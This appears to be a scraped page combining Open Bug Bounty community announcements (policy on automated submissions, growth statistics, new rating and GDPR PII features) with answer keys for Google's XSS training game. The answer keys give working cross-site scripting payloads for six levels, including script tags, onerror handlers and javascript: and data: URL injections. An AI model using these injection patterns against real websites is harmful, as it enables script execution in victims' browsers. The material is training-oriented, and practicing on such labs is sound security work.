Speaking with the team at Open Bug Bounty was the highlight of her day for Aviva Zacks of Safety Detectives. She learned that their community-driven spirit is exactly what advantageously differentiates their project from the others out there.
https://www.safetydetectives.com/blog/interview-open-bug-bounty/
Level #1: Hello, world of XSS
https://xss-game.appspot.com/level1
Solution: <script>alert('xss')</script>
hint: inspect the source code of the page
Level #2: Persistence is key
https://xss-game.appspot.com/level2
Solution: <img src=x onerror=alert('XSS')>
hint: “welcome” post contains HTML
Level #3: That sinking feeling…
https://xss-game.appspot.com/level3/frame#1
Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>
Level #4: Context matters
https://xss-game.appspot.com/level4/frame
Solution: timer=');alert('xss
Level #5: Breaking protocol
https://xss-game.appspot.com/level5/frame
Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')
Level #6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
Hey Folks,You probably noticed many small improvements of OBB made in April. We have also improved our website owner notification system to maximize rapidity, reliability and clarity of notifications.Some of you currently don’t have emails in your researcher profiles: this creates hurdles for website owners to reach out to you. Eventually, this slows down your…
Folks,
We are happy to be included into the top 5 most promising bug bounty programs of 2021 by the TheHackerNews:
https://thehackernews.com/2021/02/top-5-bug-bounty-programs-to-watch-in.html
The recognition, however, comes with the responsibility – an inalienable part of our project. During the last days we received several complaints about automated submissions of irrelevant findings such as WordPress XMMRPC file existence. The value of such submissions for website owners is at least questionable.
Therefore, as of today, all CWE-200 submissions without practical value – including phpinfo pages – will be rejected and deleted. You may still submit them within the scope of the running bug bounty programs – if the website owner expressly marked that s/he wishes to get such submissions.
We also remind that the purpose of our project is quality of the submissions, not their quantity. All usage of automated tools will lead to account suspension – let’s bring value to the website owners and suitably support their efforts to secure their websites!
How to Find Contacts To Report Bugs & Security Vulnerabilities | Bug Bounty Tutorials 2020 in this video tutorial I will show you how to find any contact information about any domain or company.
Dear Researchers and Website Owners,
First of all, we wish you a Happy and Secure New Year 2020:
With almost half-a-million vulnerability reports today, we are happy to present you a brief recap of our relentless and steady growth in 2019 attained with your valuable support and contribution that we greatly appreciate:
Best security researchers and top-rated Bug Bounty programs are available on the main page of our website, where we recently refreshed the design.
In 2020, we plan to introduce new features requested by the researchers and website owners to further improve their experience, accelerate smooth communications and reduce vulnerability remediation time.
New DevSecOps vulnerability data export options are also coming soon to facilitate crowd security testing integration with corporate CI/CD and DevSecOps strategy.
We are receiving a considerable number of incoming proposals from commercial companies to support the project, or even to merge with their own solutions and platforms. We may consider one or even several partnerships in 2020 to ensure even a faster development of our project, however, the Open Bug Bounty will always remain open, community-driven and free.
Please don’t hesitate to promote our project among you contacts and on social networks!
Thank you for making Web a safer place with us!
Hi Folks,
Some inspiring statistics [January – June 2019] of our community for your attention:
Submissions:
Researchers:
Bug Bounties:
Most Untrivial Gifts to the Researchers:
We are now the most rapidly growing open community committed to responsible disclosure. We continue to remain free, open and transparent.
We really make web safer, let’s continue this great journey!
Following, a steady growth of new bug bounty programs at Open Bug Bounty (almost 500 soon!), we gladly present the following new features on the platform:
– Detailed bug bounty ratings by researchers
– Comments on bug bounty available to researchers
– Responses to the comments available to bug bounty owners
Thereby, security researchers will now be able to focus on reputable bug bounty programs committed to timely remediate reported vulnerabilities and fairly recognize efforts of the researchers.
The new features are designed to further promote and advance a frictionless and transparent dialogue between security researchers and bug bounties owners.
Please use a respectful, fact-based and improvement-oriented style for all your comments and responses!
Open Bug Bounty community is growing: we have over 400 [fee free] bug bounty programs running now, and over 200,000 fixed security vulnerabilities. To facilitate further sustainable growth and to help website owners spot accidental exposure of personal data (PII) on their websites in a timely manner, we implemented a new type of non-intrusive submission – GDPR PII Exposure.
Here is how it works:
Please carefully read the guidelines and make sure you will deliver value and support to the website owners when submitting such entries. Website owners are welcome to update their bug bounty programs, as usual and as always at no cost – we remain a free and non-profit project.
Among other upcoming improvements and updates:
Thank you for your support and stay tuned!